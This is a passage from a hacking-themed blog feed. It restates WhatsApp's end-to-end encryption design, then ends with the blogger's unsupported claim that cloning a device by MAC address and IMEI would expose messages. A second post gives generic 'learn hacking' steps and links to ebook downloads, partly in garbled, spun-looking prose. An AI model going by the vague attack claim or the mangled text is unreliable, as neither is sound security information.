style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender encrypts the attachment with the <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key in CBC<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">mode with a random IV, then appends a MAC of the ciphertext using<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender uploads the encrypted attachment to a blob store .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender transmits a normal encrypted message to the recipient<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">that contains the encryption key, the HMAC key, a SHA256 hash of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the encrypted blob, and a pointer to the blob in the blob store .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . The recipient decrypts the message, retrieves the encrypted blob<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the blob store, verifies the SHA256 hash of it, verifies the MAC,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and decrypts the plaintext .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Group Messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Traditional unencrypted messenger apps typically employ “server-side<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">fan-out” for group messages . A client wishing to send a message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">to
a group of users transmits a single message, which is then distributed N
times to the N different group members by the server .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This is in contrast to “client-side fan-out,” where a client would transmit<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a single message N times to the N different group members itself .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages to WhatsApp groups build on the pairwise encrypted<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">sessions outlined above to achieve efficient server-side fan-out for<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">most messages sent to groups . This is accomplished using the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">“Sender Keys” component of the Signal Messaging protocol .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The first time a WhatsApp group member sends a message to a group:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The sender generates a random 32-byte <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender generates a random Curve25519 <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key <span style="color: #59595c; font-style: normal; font-variant: normal;">key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">pair .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender combines the 32-byte <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and the public key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key <span style="color: #59595c; font-style: normal; font-variant: normal;">into a <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">message .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender individually encrypts the <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">to each member<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">of the group, using the pairwise messaging protocol explained previously .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">For all subsequent messages to the group:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The sender derives a <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">updates the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender encrypts the message using <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">in CBC mode .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender signs the ciphertext using the <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender transmits the single ciphertext message to the server,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">which does server-side fan-out to all group participants .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The “hash ratchet” of the message sender’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">provides<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">forward secrecy . Whenever a group member leaves, all group<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">participants clear their <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and start over .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Call Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp calls are also end-to-end encrypted .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">When a WhatsApp user initiates a call:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The initiator builds an encrypted session with the recipient (as<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">outlined in Section <span style="color: #59595c; font-style: normal; font-variant: normal;"><i>Initiating Session Setup</i><span style="color: #59595c; font-style: normal; font-variant: normal;">), if one does not already<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">exist .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The initiator generates a random 32-byte SRTp master secret .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator transmits an encrypted message to the recipient that<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">signals an incoming call, and contains the SRTp master secret .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . If the responder answers the call, a SRTp encrypted call ensues .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Verifying Keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp users additionally have the option to verify the keys of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the other users with whom they are communicating so that they<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">are able to confirm that an unauthorized third party (or WhatsApp)<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">has not initiated a man-in-the-middle attack. This can be done<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">by scanning a QR code, or by comparing a 60-digit number .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The QR code contains:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . A version .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The user identifier for both parties.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The full 32-byte public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">for both parties .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">When either user scans the other’s QR code, the keys are<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">compared to ensure that what is in the QR code matches<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as retrieved from the server .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The 60-digit number is computed by concatenating the two<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">30-digit numeric fingerprints for each user’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Key<span style="color: #59595c; font-style: normal; font-variant: normal;">. To calculate a 30-digit numeric fingerprint:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . Iteratively SHA-512 hash the public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and user identifier 5200 times.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . Take the first 30 bytes of the final hash output.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . Split the 30-byte result into six 5-byte chunks.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . Convert each 5-byte chunk into 5 digits by interpreting each 5-byte<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chunk as a big-endian unsigned integer and reducing it modulo<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">100000 .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . Concatenate the six groups of five digits into thirty digits.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transport Security<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">All communication between WhatsApp clients and WhatsApp servers<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is layered within a separate encrypted channel . On Windows phone,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">iphone, and Android, those end-to-end encryption capable clients use<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Noise pipes with Curve25519, AES-GCM, and SHA256 from the Noise<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Protocol Framework for long running interactive connections.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This provides clients with a few nice properties:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . Extremely fast lightweight connection setup and resume .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . Encrypts metadata to hide it from unauthorized network observers.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">No information about the connecting user’s identity is revealed .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . No client authentication secrets are stored on the server . Clients<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">authenticate themselves using a Curve25519 key pair, so the server<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">only stores a client’s public authentication key. If the server’s user<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">database is ever compromised, no private authentication credentials<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">will be revealed .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"> </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;">Conclusion<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages between WhatsApp users are protected with an endto-end encryption protocol so that third parties and WhatsApp<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">cannot read them and so that the messages can only be decrypted<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">by the recipient . All types of WhatsApp messages (including<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chats, group chats, images, videos, voice messages and files)<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and WhatsApp calls are protected by end-to-end encryption .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp servers do not have access to the private keys of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp users, and WhatsApp users have the option to verify<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">keys in order to ensure the integrity of their communication.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The Signal protocol library used by WhatsApp is Open Source, available<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">here: https://github .com/whispersystems/libsignal-protocol-java/</span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<br />
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;">So
from where we can understand that WhatsApp , uses session key for each
contact and it changes only when device is updated so if a hacker
clones the device via Mac Address and IMEI code then It'll be a treasure
box for him. wait for my next post :p </span></span></span></span></span></span></span></span></span></span></span></span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;">Reference : <a href="http://whatsapp.com/" target="_blank">whatsapp.com</a></span></span></span></span></span></span></span></span></span></span></span></span></span></div>
<div style="text-align: justify;">
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"> Learn More : <a href="http://opentechnation.blogspot.com/2015/10/sql-injection-ultimate-tutorial-2015.html" target="_blank">SQL Injection guide </a></span></span></span></span></span></span></span></span></span></span></span></span></span></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-67765602273559760382017-10-29T22:23:00.002+05:302017-11-03T19:42:30.874+05:3010-steps to Learn Hacking with Latest Hacking Guides (2017)<div dir="ltr" style="text-align: left;" trbidi="on">
If you are interested in hacking then you are in right place, we charge nothing we are here to share the knowledge so here we will discuss on how to learn hacking with latest hacking guides online that's without spending anything from your pocket.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.nextleveltricks.com/wp-content/uploads/2016/04/Best-Websites-To-Learn-Ethical-Hacking.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Learn Hacking With latest Hacking Guides(2017)" border="0" data-original-height="386" data-original-width="654" height="376" src="https://www.nextleveltricks.com/wp-content/uploads/2016/04/Best-Websites-To-Learn-Ethical-Hacking.jpg" title="Learn Hacking With latest Hacking Guides(2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Learn Hacking With latest Hacking Guides(2017)</td></tr>
</tbody></table>
<br />
<br />
You have seen someone online showing off his /her skills in hacking and it is what diverted to search in google on how to learn hacking with latest hacking guides.so let us be very clear, it will take time, and by this I mean to say that it will take a lot of time, and so what I am going to explain here is from my personal experience with information technology, programming and at last its hacking or penetration testing.<br />
.<br />
Most of the people have a misconception about hacking that you will get software or tools to hack some even think that with Linux you can do a lot, but try to understand it's not the thing. if you want o hack then you need to work hard for it and I will discuss here on how to improve skills for hacking and what exactly to start hacking.<br />
<br />
<br />
<h2 style="text-align: left;">
<u>Let's start with " learn Hacking "</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://www.techtechnik.com/wp-content/uploads/2014/11/hacking.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="learn Hacking" border="0" src="http://www.techtechnik.com/wp-content/uploads/2014/11/hacking.jpg" data-original-height="533" data-original-width="800" height="426" title="learn Hacking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Learn Hacking</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<br /></div>
hmm, you know what if you want to learn hacking then you need to start from small things. as if you need to learn hacking then you need to think like a hacker so to ensure that you can go through the latest hacking guides.so you can ask me what exactly is thinking like a hacker well it's the same as a game of police-thief, so to catch a thief you need to think like a hacker you can get that by being up to date with technology news as well as hacking news you know there are several sites which are especially dedicated to hacking and news related to hacking, vulnerabilities, exploits, hacking attacks and various other tech-related news as they will serve as the latest hacking guides for you at the beginning to your hacking journey to become hacker .<br />
<br />
we will stick to the topic now and see what shall we do to ensure you will be a hacker slowly and efficiently.<br />
<br />
<h2 style="text-align: left;">
<u>Step 1: Learn Programming</u> </h2>
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.techdotmatrix.com/wp-content/uploads/2016/10/Programming-languages.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to Learn Hacking with Latest Hacking Guides (2017)" border="0" data-original-height="533" data-original-width="800" height="424" src="https://www.techdotmatrix.com/wp-content/uploads/2016/10/Programming-languages.jpg" title="How to Learn Hacking with Latest Hacking Guides (2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">random coding</td></tr>
</tbody></table>
</div>
<div>
It the first and the basic thing you need to do, coz programming is what exactly will teach you the basics and foundation stone of hacking. you should spend at last one hour a day learning to code or program yourself. You will find various coursewares online promising that if you take up their course then you will hacker and start hacking everything then lemme me tell you it's a lie if you cant code you cant hack and its why I tell programming a foundation stone for hacking. you need to be very patient about this because programming is not an easy job and it will take a lot of your time and energy as well as mind but trust it will pay you off, it just simple you want to learn hacking you need to learn programming.There are various languages to worth a try and you will love them as long as you are interested in it.</div>
you should try out Python because it's a good and easy to start, I got a lot of ebooks for programming depending on the language of your choice you should try one of those. just click on any language and start with them.<br />
<b>Java</b>: Its one of the oldest and popular programming language and if you wanna give <a href="http://opentechnation.blogspot.com/2015/09/java-8-pocket-guide.html" target="_blank">learn java</a> then just click on it.<br />
<b>Python:</b> we all know that Python is one of the best programming languages and it has become a craze among Hackers to Learn Python , it is used much for hacking that Authors even came up with books which are meaning to learn hacking with python we have collection of such books , just click on the title of books, you can download them easily without any trouble.<br />
<u>Python Ebooks</u>: <a href="http://opentechnation.blogspot.com/2015/09/programming-in-python-3-2nd-edition.html" target="_blank">Programming in Python</a><br />
<a href="http://opentechnation.blogspot.com/2015/09/beginning-python.html" target="_blank">Beginning Python</a><br />
<a href="http://opentechnation.blogspot.com/2015/09/python-pocket-reference-4th-edition.html" target="_blank"> Python Pocket Reference</a><br />
<u>Python Books Dedicated to Hacking:</u> <a href="http://opentechnation.blogspot.com/2015/09/python-hacking-essentials-ebook-download.html" target="_blank">Python Hacking Essential</a> <a href="http://opentechnation.blogspot.com/2015/09/download-free-ebook-black-hat-python-pdf.html" target="_blank">Grey Hat Python</a> <a href="http://opentechnation.blogspot.com/2015/09/download-free-ebook-black-hat-python-pdf.html" target="_blank">Black Hat Python</a><br />
well, these are the best Ebooks which you can refer to learn Hacking, yes they are packed with latest hacking guides, which you wish for.<br />
you should download one of those and start taking them seriously , yes only practice can make you perfect programmer.<br />
<br />
<h2 style="text-align: left;">
<u>Step 2: Run and Learn UNIX or LINUX like System:</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.ibm.com/developerworks/community/blogs/brian/resource/BLOGS_UPLOADED_IMAGES/varfile.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to learn hacking with latest hacking guides" border="0" data-original-height="355" data-original-width="724" height="312" src="https://www.ibm.com/developerworks/community/blogs/brian/resource/BLOGS_UPLOADED_IMAGES/varfile.png" title="How to learn hacking with latest hacking guides" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Linux Shell</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<div>
UNIX and Linux-like working frameworks are the working frameworks of the Internet. While you can figure out how to utilize the Internet without knowing UNIX, you can't be an Internet programmer without understanding UNIX. Thus, the programmer culture today is pretty firmly UNIX-focused. There are many sorts of UNIX-like working frameworks, the most prominent being Linux, which you can keep running close by Microsoft Windows on a similar machine. Download Linux on the web or locate a nearby Linux client gathering to assist you with the installation.[1] </div>
<div>
<br /></div>
<div>
A decent approach to plunge your toes in the water is to boot up what Linux fans call a live CD or USB, a conveyance that runs completely off a CD or USB without changing your hard plate. An approach to get a glance at the conceivable outcomes without doing anything extraordinary. </div>
<div>
<br /></div>
<div>
There are other UNIX-like working frameworks other than Linux, for example, the *BSD frameworks. The most prevalent *BSD frameworks are FreeBSD, NetBSD, OpenBSD and DragonFly BSD. All are open source quite recently like Linux. Notwithstanding, recollect that they are BSD and not Linux. </div>
<div>
<br /></div>
<div>
MacOS on Darwin, a UNIX working framework that is on FreeBSD. Darwin is completely free and open source and is accessible from <a href="http://opensource.apple.com/">http://opensource.apple.com</a>. Since the center of the framework is UNIX, and macOS is exceptionally prevalent, many individuals have ported over Linux applications to macOS. You can get those projects with a bundle chief like homebrew, fink or MacPorts. Then again, you can simply run Linux on a Mac close by macOS. </div>
<div>
<br /></div>
<div>
In the event that you need to get super specialty, you can even run a working framework like Open Indiana, which depends on the open source arrival of the Solaris working framework before it was gained by Oracle and influenced shut to the source. OpenIndiana and Solaris made on UNIX System V, and, in that capacity, are not good with Linux applications. All things considered, there are many ports of Linux applications. You're likely happier simply utilizing macOS, BSD or Linux since they are significantly more prevalent and have numerous more projects accessible for them.</div>
</div>
<div>
<u><br /></u></div>
<h2 style="text-align: left;">
<u>Step 3: Start writing HTML/CSS/JavaScript:</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogsimages.adobe.com/creativecloud/files/2016/09/code-10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to Learn Hacking with Latest Hacking Guides (2017)" border="0" data-original-height="510" data-original-width="800" height="408" src="https://blogsimages.adobe.com/creativecloud/files/2016/09/code-10.png" title="How to Learn Hacking with Latest Hacking Guides (2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">HTML/CSS/JAVASCRIPT</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<div>
In the event that you don't know how to program, learning fundamental HyperText Mark-Up Language (HTML) and continuously fabricating capability is basic. What you see when you take a gander at a site of pictures, pictures, and outline segments is altogether coded utilizing HTML. For a task, set out to figure out how to make an essential landing page and work your way up from that point. </div>
<div>
<br /></div>
<div>
In your program, open the page source data to look at the HTML to see an illustration. Go to Web Developer > Page Source in Firefox and invest energy taking a gander at the code. </div>
<div>
<br /></div>
<div>
You can compose HTML in an essential word preparing programs like Notepad or Simple content and spare your documents as "yourCoolFileName.HTML" so you can transfer them to a program and see your work interpreted</div>
</div>
<div>
<br /></div>
<h2 style="text-align: left;">
<u><b>Step 4: Creative Thinking:</b></u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAAhGAAAAJGFiMTljMmJkLWZkODEtNDMxMC1iMjUxLWQ3ZmIwYWY3ZWUxZA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Creative Thinking" border="0" data-original-height="533" data-original-width="800" height="426" src="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAAhGAAAAJGFiMTljMmJkLWZkODEtNDMxMC1iMjUxLWQ3ZmIwYWY3ZWUxZA.jpg" title="Creative Thinking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Creative Thinking</td></tr>
</tbody></table>
<div>
<u><b><br /></b></u></div>
<div>
<div>
Now that you have got the fundamental skills in situ, you'll begin thinking artistically. Hackers are like artists, philosophers, and engineers all rolled up into one. They believe freedom and mutual responsibility. the planet is jam-packed with fascinating issues waiting to be resolved. Hackers take a special enjoyment of resolution issues, sharpening their skills, and elbow greases their intelligence.</div>
<div>
Hackers have a diversity of interests culturally and intellectually, outside of hacking. Work as intensely as you play, and play as intensely as you're employed. For true hackers, the boundaries between "play," "work," "science," and "art" all tend to disappear or to merge into a high-level artistic playfulness.</div>
<div>
Read fantasy. attend fantasy conventions, that could be a good way to satisfy hackers and proto-hackers.</div>
<div>
Consider coaching in an exceeding self-defense. the type of mental discipline needed for martial arts appears to be similar in necessary ways in which to what hackers do. the foremost hacker-ly martial arts are those that emphasize mental discipline, relaxed awareness, and management, instead of raw strength, vigor, or physical toughness. martial art could be a sensible self-defense for hackers</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
<b><u>Step 5: Learn Algorithm:</u></b></h2>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
